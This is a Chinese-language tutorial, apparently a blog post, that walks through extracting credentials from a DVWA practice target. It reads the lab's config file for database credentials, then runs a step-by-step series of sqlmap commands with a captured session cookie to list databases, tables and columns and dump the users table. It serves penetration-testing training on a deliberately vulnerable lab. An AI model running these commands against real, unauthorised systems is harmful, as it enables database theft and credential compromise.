sqlmap DVWA脱库

本文描述使用sqlmap对DVWA靶机进行脱库

一、先登录靶机,查看目标靶机的用户名密码

1、先查询dvwa靶机的登录代码文件

    进入OWASP系统的/var/www/dvwa目录,查询login.php登录文件可知,存在sql注入,如下:

sqlmap DVWA脱库_第1张图片

2、进入/var/www/dvwa/config目录,查看config.inc.php文件得到dvwa数据库的用户名和密码:

sqlmap DVWA脱库_第2张图片

3、连接dvwa数据库:mysql -u dvwa -p,密码为dvwa,得到dvwa库和users表,查询出表中的用户名和密码

sqlmap DVWA脱库_第3张图片sqlmap DVWA脱库_第4张图片

到这里我们得到了目标靶机的用户名以及对应密码的md5值

二、使用sqlmap进行爆库

1、打开dvwa-->sql injection,把级别调到low

抓包,得到requests url和cookie(slmap扫描的时候会重定向到认证的页面,拿到cookie,才能在这个页面进行持续扫描)

sqlmap DVWA脱库_第5张图片

sqlmap DVWA脱库_第6张图片

2、扫描当前页面

    sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --       cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7'

sqlmap DVWA脱库_第7张图片

3、获取数据库名称

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dbs -v 0

sqlmap DVWA脱库_第8张图片

4、获取表明

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa --tables
sqlmap DVWA脱库_第9张图片

5、获取列名

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa -T users --columns

sqlmap DVWA脱库_第10张图片

6、脱库

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dump  -D dvwa -T users -C 'user,password'

sqlmap DVWA脱库_第11张图片

保存在用户名密码保存在users.csv里

你可能感兴趣的:(渗透测试)